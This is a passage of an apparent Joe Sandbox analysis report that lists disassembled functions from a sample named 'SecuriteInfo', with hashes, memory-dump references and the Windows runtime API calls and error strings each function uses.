                                                                                                                                                                                                                                                            • Instruction ID: 52988c1463721bbe64ee3e68d02b60853efa56ff108b65e3342bc53665a41e03
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00117222618A4286F350AF56AC44B29F3B0FF88FE4F940275D91D87794CF3CD9458B54
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BE77
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BEAD
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BEDA
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BEEB
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BEFC
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF72AA85AAD,?,?,?,?,00007FF72AA8F79F,?,?,00000000,00007FF72AA8BF86,?,?,?), ref: 00007FF72AA8BF17
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                                                                                                                                                                                                                            • Instruction ID: 35389cb0e44d71ed9ee569df50eb540e23e7adb250880bad8170887e65623b7e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4114F10A0A6434EF764B7219D5593DE2B1CF847B0FD446B5EA2E466D6DF2CA8038B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                            • Opcode ID: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                                                                                                                                                                                                                            • Instruction ID: a0b102a83cb8466769ab716dfbbceaee2e439486c52c3ada1a547441fd871776
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58311C72A09A8289EB24EF25EC559FAA371FF88784F800175EA4D4BB55DF3CD506CB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF72AA788E2,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA729F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78560: GetLastError.KERNEL32(00000000,00007FF72AA72A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA78587
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78560: FormatMessageW.KERNEL32 ref: 00007FF72AA785B6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF72AA72A9B), ref: 00007FF72AA78C0A
                                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF72AA72AD0
                                                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF72AA72AEC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                            • Opcode ID: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                                                                                                                                                                                                                            • Instruction ID: 5384191719b9222b0ccc9290393568aa2854662d61dfd26663f7479e8632e401
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9313E72628A8291F720AB10EC519EFA374FF84B84FC04076E68D46A59DF3CD646CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                            • Opcode ID: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                                                                                                                                                                                                                            • Instruction ID: a3ba052edb00f6c5dad9978430c16fd0665e94efd6d1eeb4ad2ce884605bd7a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F04F75A19A0286FB10AF24EC54F3AE370EF88761F9402B5C56E462E4CF2CD54A8B60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                            • Instruction ID: d50491bea8969994bc9dc4ca50480119e267a8b87e68f26f7a376d7e0517ab69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D119832D1CA0301FB543155DC46F75B160FF58370E9506B7E56F0A2F68E2E5A434961
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8BF4F
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8BF6E
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8BF96
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8BFA7
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8BFB8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                                                                                                                                                                                                                            • Instruction ID: b745fed43d3166c9de2cf0b03c29505a2d33ca4300c5d130b367e9ef960e4e28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA115110F0A60349FB5877219D5193D92B1DF847B0F9842B6EA2D866D6DE2CE8038E20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                                                                                                                                                                                                                            • Instruction ID: 6ddc977392bcf6c68a2bd0ab999f16fd9aad840f13a99eccc08d7ac4ba3c14cf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F11DA60E0B2074DFB6872219C6597D92B2CF85770ED446B6DB3D4A2D3DE2CB8438A21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                            • Opcode ID: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                                                                                                                                                                                                                            • Instruction ID: 6e6959cf92d3f781000eea08ab15e342f6b32a633c34537a7f5e16975b289147
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8691E062A08A4689F722AE29DC51B7DB7B0EF40B58FC44176DA5D473C5DF3CE8468B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            • Opcode ID: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                                                                                                                                                                                                                            • Instruction ID: 5e347198ba9e4a94493c618180c5c4726afe60209a4c6da84585da2efe3da485
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E181A735D0824389FB656F198D52E78B6B0EF10BC4FD540B2CA0D97299DB2DFA439E21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                                                                                                                                                                                                                            • Instruction ID: 3fe922f306b06d5840ee3cccde12c4930d84e1a71b1409e4a63547e80a528314
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19519132A197028AFB14EF15EC44E7EA7A5EF44B88F908175EA5D43784DF3CE8428B10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                                                                                                                                                                                                                            • Instruction ID: 0a750a55d19d11709a8c63ae395c42317ef85c96750effc36f6659d8da434b60
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74618F32908BC585E760AB15E840BAEF7A0FB85B84F444266EB9C17B95DF3CD192CF10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                                                                                                                                                                                                                            • Instruction ID: 5b451a254d6addb21ec5d1057d5cbbfb4cd123eb6a03915e4b7e1adb40c659d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 845181329082428AFB64AF119C44A6EB7B0FF84B94F9441B6DA8C47795CF3CE552CF11
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
